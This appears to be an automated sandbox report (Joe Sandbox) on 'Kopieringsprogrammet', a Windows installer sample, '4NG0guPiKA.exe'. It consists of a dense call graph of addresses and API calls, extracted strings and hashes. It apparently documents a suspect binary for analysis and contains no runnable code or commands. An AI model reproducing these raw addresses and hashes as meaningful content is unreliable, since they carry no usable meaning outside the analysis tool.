                                                                                                            APIs visible as graph nodes, grouped: process and module control (CreateProcessW, WaitForSingleObject, GetExitCodeProcess, ShellExecuteW, ExitProcess, ExitWindowsEx, GetCurrentProcess, Sleep, GetCommandLineW, GetModuleHandleW, GetModuleFileNameW, LoadLibraryW, FreeLibrary, CoCreateInstance, OleInitialize, SetErrorMode, GetVersion, GetTickCount); memory (VirtualProtect, GlobalAlloc, GlobalFree, GlobalLock, GlobalUnlock); files and directories (CreateFileW, ReadFile, WriteFile, SetFilePointer, GetFileSize, GetFileAttributesW, SetFileTime, CompareFileTime, CopyFileW, DeleteFileW, CreateDirectoryW, SetCurrentDirectoryW, GetTempPathW, GetTempFileNameW, FindFirstFileW, FindNextFileW, GetDiskFreeSpaceW, GetWindowsDirectoryW, GetSystemDirectoryW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ExpandEnvironmentStringsW, SetEnvironmentVariableW, WritePrivateProfileStringW, GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW); registry (RegOpenKeyExW, RegQueryValueExW, RegEnumKeyW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey); windows, dialogs and clipboard (FindWindowExW, SendMessageTimeoutW, SendMessageW, SetForegroundWindow, CreateWindowExW, DialogBoxParamW, CreateDialogParamW, MessageBoxIndirectW, TrackPopupMenu, SetWindowLongW, GetWindowLongW, ShowWindow, SetTimer, PeekMessageW, DispatchMessageW, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard).
4195 404206 SetBkColor 4193->4195 4194->4196 4197 404223 DeleteObject 4194->4197 4198 40422a CreateBrushIndirect 4194->4198 4195->4194 4197->4198 4198->4196 5383 401491 5384 405194 25 API calls 5383->5384 5385 401498 5384->5385 5386 404912 5387 404922 5386->5387 5388 40493e 5386->5388 5397 4056aa GetDlgItemTextW 5387->5397 5390 404971 5388->5390 5391 404944 SHGetPathFromIDListW 5388->5391 5393 40495b SendMessageW 5391->5393 5394 404954 5391->5394 5392 40492f SendMessageW 5392->5388 5393->5390 5396 40140b 2 API calls 5394->5396 5396->5393 5397->5392 5398 402295 5399 402b3a 18 API calls 5398->5399 5400 4022a4 5399->5400 5401 402b3a 18 API calls 5400->5401 5402 4022ad 5401->5402 5403 402b3a 18 API calls 5402->5403 5404 4022b7 GetPrivateProfileStringW 5403->5404 4441 401718 4442 402b3a 18 API calls 4441->4442 4443 40171f SearchPathW 4442->4443 4444 40173a 4443->4444 4445 401f98 4446 401faa 4445->4446 4456 40205c 4445->4456 4447 402b3a 18 API calls 4446->4447 4448 401fb1 4447->4448 4450 402b3a 18 API calls 4448->4450 4449 401423 25 API calls 4451 402197 4449->4451 4452 401fba 4450->4452 4453 401fd0 LoadLibraryExW 4452->4453 4454 401fc2 GetModuleHandleW 4452->4454 4455 401fe1 4453->4455 4453->4456 4454->4453 4454->4455 4468 4062c0 WideCharToMultiByte 4455->4468 4456->4449 4459 401ff2 4461 402011 4459->4461 4462 401ffa 4459->4462 4460 40202b 4463 405194 25 API calls 4460->4463 4471 10001771 4461->4471 4464 401423 25 API calls 4462->4464 4465 402002 4463->4465 4464->4465 4465->4451 4466 40204e FreeLibrary 4465->4466 4466->4451 4469 4062ea GetProcAddress 4468->4469 4470 401fec 4468->4470 4469->4470 4470->4459 4470->4460 4472 100017a1 4471->4472 4513 10001b3e 4472->4513 4474 100017a8 4475 100018be 4474->4475 4476 100017c0 4474->4476 4477 100017b9 4474->4477 4475->4465 4547 100022eb 4476->4547 4565 100022a1 4477->4565 4482 100017e5 4484 10001824 4482->4484 4485 10001806 4482->4485 4483 100017d6 4491 100017e7 4483->4491 4492 100017dc 4483->4492 4487 10001866 4484->4487 4488 
1000182a 4484->4488 4578 1000248d 4485->4578 4496 1000248d 10 API calls 4487->4496 4494 100015cc 3 API calls 4488->4494 4489 100017ef 4489->4482 4575 10002b23 4489->4575 4569 1000260b 4491->4569 4492->4482 4559 10002868 4492->4559 4499 10001840 4494->4499 4500 10001858 4496->4500 4503 1000248d 10 API calls 4499->4503 4504 100018ad 4500->4504 4601 10002450 4500->4601 4502 100017ed 4502->4482 4503->4500 4504->4475 4508 100018b7 GlobalFree 4504->4508 4508->4475 4510 10001899 4510->4504 4605 10001555 wsprintfW 4510->4605 4511 10001892 FreeLibrary 4511->4510 4608 1000121b GlobalAlloc 4513->4608 4515 10001b62 4609 1000121b GlobalAlloc 4515->4609 4517 10001b6d 4610 10001243 4517->4610 4519 10001da0 GlobalFree GlobalFree GlobalFree 4520 10001dbd 4519->4520 4536 10001e07 4519->4536 4521 1000210d 4520->4521 4529 10001dd2 4520->4529 4520->4536 4523 1000212f GetModuleHandleW 4521->4523 4521->4536 4522 10001c43 GlobalAlloc 4544 10001b75 4522->4544 4524 10002140 LoadLibraryW 4523->4524 4525 10002155 4523->4525 4524->4525 4524->4536 4621 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4525->4621 4526 10001c8e lstrcpyW 4530 10001c98 lstrcpyW 4526->4530 4527 10001cac GlobalFree 4527->4544 4529->4536 4617 1000122c 4529->4617 4530->4544 4531 100021a7 4533 100021b4 lstrlenW 4531->4533 4531->4536 4532 10002067 4532->4536 4539 100020af lstrcpyW 4532->4539 4622 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4533->4622 4536->4474 4537 10002167 4537->4531 4546 10002191 GetProcAddress 4537->4546 4539->4536 4540 10001cea 4540->4544 4615 100015a7 GlobalSize GlobalAlloc 4540->4615 4541 10001f56 GlobalFree 4541->4544 4542 100021ce 4542->4536 4544->4519 4544->4522 4544->4526 4544->4527 4544->4530 4544->4532 4544->4536 4544->4540 4544->4541 4545 1000122c 2 API calls 4544->4545 4620 1000121b GlobalAlloc 4544->4620 4545->4544 4546->4531 4550 10002303 4547->4550 4548 1000122c GlobalAlloc lstrcpynW 4548->4550 4549 10001243 
3 API calls 4549->4550 4550->4548 4550->4549 4552 10002419 GlobalFree 4550->4552 4554 100023d5 GlobalAlloc WideCharToMultiByte 4550->4554 4555 100023ae GlobalAlloc 4550->4555 4556 10002390 lstrlenW 4550->4556 4625 100012c8 4550->4625 4552->4550 4553 100017c6 4552->4553 4553->4482 4553->4483 4553->4489 4554->4552 4557 1000239b 4555->4557 4556->4552 4556->4557 4557->4552 4630 1000259f 4557->4630 4561 1000287a 4559->4561 4560 1000291f EnumWindows 4562 1000293d 4560->4562 4561->4560 4563 10002a39 4562->4563 4564 10002a2e GetLastError 4562->4564 4563->4482 4564->4563 4566 100022b1 4565->4566 4567 100017bf 4565->4567 4566->4567 4568 100022c3 GlobalAlloc 4566->4568 4567->4476 4568->4566 4573 10002627 4569->4573 4570 10002678 GlobalAlloc 4574 1000269a 4570->4574 4571 1000268b 4572 10002690 GlobalSize 4571->4572 4571->4574 4572->4574 4573->4570 4573->4571 4574->4502 4576 10002b2e 4575->4576 4577 10002b6e GlobalFree 4576->4577 4580 100024ad 4578->4580 4581 100024db wsprintfW 4580->4581 4582 10002558 GlobalFree 4580->4582 4583 1000250e MultiByteToWideChar 4580->4583 4584 10002581 GlobalFree 4580->4584 4586 100024fd lstrcpynW 4580->4586 4587 100024ec StringFromGUID2 4580->4587 4588 10001280 2 API calls 4580->4588 4633 1000121b GlobalAlloc 4580->4633 4634 100012f3 4580->4634 4581->4580 4582->4580 4583->4580 4584->4580 4585 1000180c 4584->4585 4590 100015cc 4585->4590 4586->4580 4587->4580 4588->4580 4638 1000121b GlobalAlloc 4590->4638 4592 100015d2 4593 100015df lstrcpyW 4592->4593 4595 100015f9 4592->4595 4596 10001613 4593->4596 4595->4596 4597 100015fe wsprintfW 4595->4597 4598 10001280 4596->4598 4597->4596 4599 100012c3 GlobalFree 4598->4599 4600 10001289 GlobalAlloc lstrcpynW 4598->4600 4599->4500 4600->4599 4602 1000245e 4601->4602 4604 10001879 4601->4604 4603 1000247a GlobalFree 4602->4603 4602->4604 4603->4602 4604->4510 4604->4511 4606 10001280 2 API calls 4605->4606 4607 10001576 4606->4607 4607->4504 4608->4515 4609->4517 4611 1000127c 4610->4611 4612 1000124d 
4610->4612 4611->4544 4612->4611 4623 1000121b GlobalAlloc 4612->4623 4614 10001259 lstrcpyW GlobalFree 4614->4544 4616 100015c5 4615->4616 4616->4540 4624 1000121b GlobalAlloc 4617->4624 4619 1000123b lstrcpynW 4619->4536 4620->4544 4621->4537 4622->4542 4623->4614 4624->4619 4626 100012d0 4625->4626 4627 100012ee 4625->4627 4626->4627 4628 1000122c 2 API calls 4626->4628 4627->4627 4629 100012ec 4628->4629 4629->4550 4631 10002603 4630->4631 4632 100025ad VirtualAlloc 4630->4632 4631->4557 4632->4631 4633->4580 4635 10001324 4634->4635 4636 100012fc 4634->4636 4635->4580 4636->4635 4637 10001308 lstrcpyW 4636->4637 4637->4635 4638->4592 5405 10001058 5406 10001243 3 API calls 5405->5406 5408 10001074 5406->5408 5407 100010dd 5408->5407 5409 1000152e 4 API calls 5408->5409 5410 10001092 5408->5410 5409->5410 5411 1000152e 4 API calls 5410->5411 5412 100010a2 5411->5412 5413 100010b2 5412->5413 5414 100010a9 GlobalSize 5412->5414 5415 100010b6 GlobalAlloc 5413->5415 5416 100010c7 5413->5416 5414->5413 5417 10001555 3 API calls 5415->5417 5418 100010d2 GlobalFree 5416->5418 5417->5416 5418->5407 5419 40159b 5420 402b3a 18 API calls 5419->5420 5421 4015a2 SetFileAttributesW 5420->5421 5422 4015b4 5421->5422 5423 40149e 5424 4014ac PostQuitMessage 5423->5424 5425 40223e 5423->5425 5424->5425 5426 4021a0 5427 402b3a 18 API calls 5426->5427 5428 4021a6 5427->5428 5429 402b3a 18 API calls 5428->5429 5430 4021af 5429->5430 5431 402b3a 18 API calls 5430->5431 5432 4021b8 5431->5432 5433 40622d 2 API calls 5432->5433 5434 4021c1 5433->5434 5435 4021d2 lstrlenW lstrlenW 5434->5435 5439 4021c5 5434->5439 5437 405194 25 API calls 5435->5437 5436 405194 25 API calls 5440 4021cd 5436->5440 5438 402210 SHFileOperationW 5437->5438 5438->5439 5438->5440 5439->5436 5439->5440 5441 100010e1 5442 10001111 5441->5442 5443 10001243 3 API calls 5442->5443 5453 10001121 5443->5453 5444 100011d8 GlobalFree 5445 100012c8 2 API calls 5445->5453 5446 10001243 3 API calls 5446->5453 5447 
100011d3 5447->5444 5448 100011f8 GlobalFree 5448->5453 5449 10001280 2 API calls 5452 100011c4 GlobalFree 5449->5452 5450 10001164 GlobalAlloc 5450->5453 5451 100012f3 lstrcpyW 5451->5453 5452->5453 5453->5444 5453->5445 5453->5446 5453->5447 5453->5448 5453->5449 5453->5450 5453->5451 5453->5452 3872 401b22 3873 401b73 3872->3873 3874 401b2f 3872->3874 3876 401b78 3873->3876 3877 401b9d GlobalAlloc 3873->3877 3875 401bb8 3874->3875 3880 401b46 3874->3880 3879 405f0c 18 API calls 3875->3879 3884 40223e 3875->3884 3876->3884 3893 405eea lstrcpynW 3876->3893 3878 405f0c 18 API calls 3877->3878 3878->3875 3883 402238 3879->3883 3891 405eea lstrcpynW 3880->3891 3894 4056c6 3883->3894 3885 401b8a GlobalFree 3885->3884 3886 401b55 3892 405eea lstrcpynW 3886->3892 3889 401b64 3889->3884 3898 405eea lstrcpynW 3889->3898 3891->3886 3892->3889 3893->3885 3895 4056db 3894->3895 3896 405727 3895->3896 3897 4056ef MessageBoxIndirectW 3895->3897 3896->3884 3897->3896 3898->3884 3899 401924 3900 401926 3899->3900 3901 402b3a 18 API calls 3900->3901 3902 40192b 3901->3902 3905 405772 3902->3905 3944 405a3d 3905->3944 3908 4057b1 3911 4058d1 3908->3911 3958 405eea lstrcpynW 3908->3958 3909 40579a DeleteFileW 3910 401934 3909->3910 3911->3910 3988 40622d FindFirstFileW 3911->3988 3913 4057d7 3914 4057ea 3913->3914 3915 4057dd lstrcatW 3913->3915 3959 405981 lstrlenW 3914->3959 3917 4057f0 3915->3917 3920 405800 lstrcatW 3917->3920 3921 40580b lstrlenW FindFirstFileW 3917->3921 3920->3921 3921->3911 3929 40582d 3921->3929 3922 4058fa 3991 405935 lstrlenW CharPrevW 3922->3991 3925 4058b4 FindNextFileW 3925->3929 3930 4058ca FindClose 3925->3930 3926 40572a 5 API calls 3928 40590c 3926->3928 3931 405910 3928->3931 3932 405926 3928->3932 3929->3925 3938 405875 3929->3938 3963 405eea lstrcpynW 3929->3963 3930->3911 3931->3910 3935 405194 25 API calls 3931->3935 3934 405194 25 API calls 3932->3934 3934->3910 3937 40591d 3935->3937 3936 405772 64 API calls 3936->3938 3940 405d84 40 API 
calls 3937->3940 3938->3925 3938->3936 3939 405194 25 API calls 3938->3939 3964 40572a 3938->3964 3972 405194 3938->3972 3983 405d84 3938->3983 3939->3925 3942 405924 3940->3942 3942->3910 3994 405eea lstrcpynW 3944->3994 3946 405a4e 3995 4059e0 CharNextW CharNextW 3946->3995 3949 405792 3949->3908 3949->3909 3950 40617e 5 API calls 3956 405a64 3950->3956 3951 405a95 lstrlenW 3952 405aa0 3951->3952 3951->3956 3954 405935 3 API calls 3952->3954 3953 40622d 2 API calls 3953->3956 3955 405aa5 GetFileAttributesW 3954->3955 3955->3949 3956->3949 3956->3951 3956->3953 3957 405981 2 API calls 3956->3957 3957->3951 3958->3913 3960 40598f 3959->3960 3961 4059a1 3960->3961 3962 405995 CharPrevW 3960->3962 3961->3917 3962->3960 3962->3961 3963->3929 4001 405b31 GetFileAttributesW 3964->4001 3967 405757 3967->3938 3968 405745 RemoveDirectoryW 3970 405753 3968->3970 3969 40574d DeleteFileW 3969->3970 3970->3967 3971 405763 SetFileAttributesW 3970->3971 3971->3967 3973 4051af 3972->3973 3981 405251 3972->3981 3974 4051cb lstrlenW 3973->3974 3975 405f0c 18 API calls 3973->3975 3976 4051f4 3974->3976 3977 4051d9 lstrlenW 3974->3977 3975->3974 3979 405207 3976->3979 3980 4051fa SetWindowTextW 3976->3980 3978 4051eb lstrcatW 3977->3978 3977->3981 3978->3976 3979->3981 3982 40520d SendMessageW SendMessageW SendMessageW 3979->3982 3980->3979 3981->3938 3982->3981 4004 406254 GetModuleHandleA 3983->4004 3987 405dac 3987->3938 3989 406243 FindClose 3988->3989 3990 4058f6 3988->3990 3989->3990 3990->3910 3990->3922 3992 405951 lstrcatW 3991->3992 3993 405900 3991->3993 3992->3993 3993->3926 3994->3946 3996 4059fd 3995->3996 3999 405a0f 3995->3999 3998 405a0a CharNextW 3996->3998 3996->3999 3997 405a33 3997->3949 3997->3950 3998->3997 3999->3997 4000 405962 CharNextW 3999->4000 4000->3999 4002 405736 4001->4002 4003 405b43 SetFileAttributesW 4001->4003 4002->3967 4002->3968 4002->3969 4003->4002 4005 406270 LoadLibraryA 4004->4005 4006 40627b GetProcAddress 4004->4006 4005->4006 4007 
405d8b 4005->4007 4006->4007 4007->3987 4008 405c08 lstrcpyW 4007->4008 4009 405c31 4008->4009 4010 405c57 GetShortPathNameW 4008->4010 4033 405b56 GetFileAttributesW CreateFileW 4009->4033 4011 405c6c 4010->4011 4012 405d7e 4010->4012 4011->4012 4014 405c74 wsprintfA 4011->4014 4012->3987 4017 405f0c 18 API calls 4014->4017 4015 405c3b CloseHandle GetShortPathNameW 4015->4012 4016 405c4f 4015->4016 4016->4010 4016->4012 4018 405c9c 4017->4018 4034 405b56 GetFileAttributesW CreateFileW 4018->4034 4020 405ca9 4020->4012 4021 405cb8 GetFileSize GlobalAlloc 4020->4021 4022 405d77 CloseHandle 4021->4022 4023 405cda 4021->4023 4022->4012 4035 405bd9 ReadFile 4023->4035 4028 405cf9 lstrcpyA 4031 405d1b 4028->4031 4029 405d0d 4030 405abb 4 API calls 4029->4030 4030->4031 4032 405d52 SetFilePointer WriteFile GlobalFree 4031->4032 4032->4022 4033->4015 4034->4020 4036 405bf7 4035->4036 4036->4022 4037 405abb lstrlenA 4036->4037 4038 405afc lstrlenA 4037->4038 4039 405b04 4038->4039 4040 405ad5 lstrcmpiA 4038->4040 4039->4028 4039->4029 4040->4039 4041 405af3 CharNextA 4040->4041 4041->4038 5461 402224 5462 40223e 5461->5462 5463 40222b 5461->5463 5464 405f0c 18 API calls 5463->5464 5465 402238 5464->5465 5466 4056c6 MessageBoxIndirectW 5465->5466 5466->5462 5467 10001667 5468 1000152e 4 API calls 5467->5468 5471 1000167f 5468->5471 5469 100016c5 GlobalFree 5470 1000169a 5470->5469 5471->5469 5471->5470 5472 100016b1 VirtualFree 5471->5472 5472->5469 5473 402729 5474 402730 5473->5474 5475 4029c7 5473->5475 5476 402736 FindClose 5474->5476 5476->5475 5477 401cab 5478 402b1d 18 API calls 5477->5478 5479 401cb2 5478->5479 5480 402b1d 18 API calls 5479->5480 5481 401cba GetDlgItem 5480->5481 5482 4024e8 5481->5482 5483 4016af 5484 402b3a 18 API calls 5483->5484 5485 4016b5 GetFullPathNameW 5484->5485 5486 4016f1 5485->5486 5487 4016cf 5485->5487 5488 401706 GetShortPathNameW 5486->5488 5489 4029c7 5486->5489 5487->5486 5490 40622d 2 API calls 5487->5490 5488->5489 5491 4016e1 
5490->5491 5491->5486 5493 405eea lstrcpynW 5491->5493 5493->5486 4225 402331 4226 402337 4225->4226 4227 402b3a 18 API calls 4226->4227 4228 402349 4227->4228 4229 402b3a 18 API calls 4228->4229 4230 402353 RegCreateKeyExW 4229->4230 4231 402793 4230->4231 4232 40237d 4230->4232 4233 402398 4232->4233 4234 402b3a 18 API calls 4232->4234 4235 4023a4 4233->4235 4237 402b1d 18 API calls 4233->4237 4236 40238e lstrlenW 4234->4236 4238 4023bf RegSetValueExW 4235->4238 4242 403062 4235->4242 4236->4233 4237->4235 4239 4023d5 RegCloseKey 4238->4239 4239->4231 4243 403072 SetFilePointer 4242->4243 4244 40308e 4242->4244 4243->4244 4257 40317d GetTickCount 4244->4257 4247 405bd9 ReadFile 4248 4030ae 4247->4248 4249 40317d 43 API calls 4248->4249 4253 403139 4248->4253 4250 4030c5 4249->4250 4251 40313f ReadFile 4250->4251 4250->4253 4254 4030d5 4250->4254 4251->4253 4253->4238 4254->4253 4255 405bd9 ReadFile 4254->4255 4256 403108 WriteFile 4254->4256 4255->4254 4256->4253 4256->4254 4258 4032e7 4257->4258 4259 4031ac 4257->4259 4260 402d1a 33 API calls 4258->4260 4270 40330f SetFilePointer 4259->4270 4268 403095 4260->4268 4262 4031b7 SetFilePointer 4267 4031dc 4262->4267 4266 403271 WriteFile 4266->4267 4266->4268 4267->4266 4267->4268 4269 4032c8 SetFilePointer 4267->4269 4271 4032f9 4267->4271 4274 406390 4267->4274 4281 402d1a 4267->4281 4268->4247 4268->4253 4269->4258 4270->4262 4272 405bd9 ReadFile 4271->4272 4273 40330c 4272->4273 4273->4267 4275 4063b5 4274->4275 4278 4063bd 4274->4278 4275->4267 4276 406444 GlobalFree 4277 40644d GlobalAlloc 4276->4277 4277->4275 4277->4278 4278->4275 4278->4276 4278->4277 4279 4064c4 GlobalAlloc 4278->4279 4280 4064bb GlobalFree 4278->4280 4279->4275 4279->4278 4280->4279 4282 402d43 4281->4282 4283 402d2b 4281->4283 4285 402d53 GetTickCount 4282->4285 4286 402d4b 4282->4286 4284 402d34 DestroyWindow 4283->4284 4289 402d3b 4283->4289 4284->4289 4288 402d61 4285->4288 4285->4289 4287 40628d 2 API calls 4286->4287 4287->4289 4290 
402d96 CreateDialogParamW ShowWindow 4288->4290 4291 402d69 4288->4291 4289->4267 4290->4289 4291->4289 4296 402cfe 4291->4296 4293 402d77 wsprintfW 4294 405194 25 API calls 4293->4294 4295 402d94 4294->4295 4295->4289 4297 402d0d 4296->4297 4298 402d0f MulDiv 4296->4298 4297->4298 4298->4293 5501 4014b8 5502 4014be 5501->5502 5503 401389 2 API calls 5502->5503 5504 4014c6 5503->5504 4648 4015b9 4649 402b3a 18 API calls 4648->4649 4650 4015c0 4649->4650 4651 4059e0 4 API calls 4650->4651 4661 4015c9 4651->4661 4652 401614 4654 401646 4652->4654 4655 401619 4652->4655 4653 405962 CharNextW 4656 4015d7 CreateDirectoryW 4653->4656 4660 401423 25 API calls 4654->4660 4657 401423 25 API calls 4655->4657 4658 4015ed GetLastError 4656->4658 4656->4661 4659 401620 4657->4659 4658->4661 4662 4015fa GetFileAttributesW 4658->4662 4666 405eea lstrcpynW 4659->4666 4665 40163e 4660->4665 4661->4652 4661->4653 4662->4661 4664 40162d SetCurrentDirectoryW 4664->4665 4666->4664 5505 401939 5506 402b3a 18 API calls 5505->5506 5507 401940 lstrlenW 5506->5507 5508 4024e8 5507->5508 4880 40173f 4881 402b3a 18 API calls 4880->4881 4882 401746 4881->4882 4883 405b85 2 API calls 4882->4883 4884 40174d 4883->4884 4885 405b85 2 API calls 4884->4885 4885->4884 5509 40653f 5510 4063c3 5509->5510 5511 406d2e 5510->5511 5512 406444 GlobalFree 5510->5512 5513 40644d GlobalAlloc 5510->5513 5514 4064c4 GlobalAlloc 5510->5514 5515 4064bb GlobalFree 5510->5515 5512->5513 5513->5510 5513->5511 5514->5510 5514->5511 5515->5514

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • #17.COMCTL32 ref: 00403379
                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                              • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                              • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                              • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                            • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                              • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                            • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\4NG0guPiKA.exe",00000000), ref: 004033DB
                                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\4NG0guPiKA.exe",00000020), ref: 00403402
                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040350B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351C
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403528
                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353C
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403544
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403555
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355D
                                                                                                            • DeleteFileW.KERNELBASE(1033), ref: 00403571
                                                                                                            • OleUninitialize.OLE32(?), ref: 00403621
                                                                                                            • ExitProcess.KERNEL32 ref: 00403641
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\4NG0guPiKA.exe",00000000,?), ref: 0040364D
                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\4NG0guPiKA.exe",00000000,?), ref: 00403659
                                                                                                            • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403665
                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366C
                                                                                                            • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\4NG0guPiKA.exe,0041FE90,00000001), ref: 004036DA
                                                                                                            • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                                            • ExitProcess.KERNEL32 ref: 004037BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                            • String ID: "C:\Users\user\Desktop\4NG0guPiKA.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$C:\Users\user\Desktop$C:\Users\user\Desktop\4NG0guPiKA.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                            • API String ID: 4107622049-1967632260
                                                                                                            • Opcode ID: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                                            • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                                                            • Opcode Fuzzy Hash: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                                            • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 116 404b10-404b5c GetDlgItem * 2 117 404b62-404bf6 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 116->117 118 404d7d-404d84 116->118 119 404c05-404c0c DeleteObject 117->119 120 404bf8-404c03 SendMessageW 117->120 121 404d86-404d96 118->121 122 404d98 118->122 124 404c0e-404c16 119->124 120->119 123 404d9b-404da4 121->123 122->123 125 404da6-404da9 123->125 126 404daf-404db5 123->126 127 404c18-404c1b 124->127 128 404c3f-404c43 124->128 125->126 130 404e93-404e9a 125->130 133 404dc4-404dcb 126->133 134 404db7-404dbe 126->134 131 404c20-404c3d call 405f0c SendMessageW * 2 127->131 132 404c1d 127->132 128->124 129 404c45-404c71 call 40412f * 2 128->129 172 404c77-404c7d 129->172 173 404d3c-404d4f GetWindowLongW SetWindowLongW 129->173 138 404f0b-404f13 130->138 139 404e9c-404ea2 130->139 131->128 132->131 135 404e40-404e43 133->135 136 404dcd-404dd0 133->136 134->130 134->133 135->130 149 404e45-404e4f 135->149 144 404dd2-404dd9 136->144 145 404ddb-404df0 call 404a5e 136->145 141 404f15-404f1b SendMessageW 138->141 142 404f1d-404f24 138->142 147 4050f3-405105 call 404196 139->147 148 404ea8-404eb2 139->148 141->142 152 404f26-404f2d 142->152 153 404f58-404f5f 142->153 144->135 144->145 145->135 171 404df2-404e03 145->171 148->147 156 404eb8-404ec7 SendMessageW 148->156 150 404e51-404e5d SendMessageW 149->150 151 404e5f-404e69 149->151 150->151 151->130 159 404e6b-404e75 151->159 160 404f36-404f3d 152->160 161 404f2f-404f30 ImageList_Destroy 152->161 164 4050b5-4050bc 153->164 165 404f65-404f71 call 4011ef 153->165 156->147 166 404ecd-404ede SendMessageW 156->166 167 404e86-404e90 159->167 168 404e77-404e84 159->168 169 404f46-404f52 160->169 170 404f3f-404f40 GlobalFree 160->170 161->160 164->147 177 4050be-4050c5 164->177 190 404f81-404f84 165->190 191 404f73-404f76 165->191 175 404ee0-404ee6 
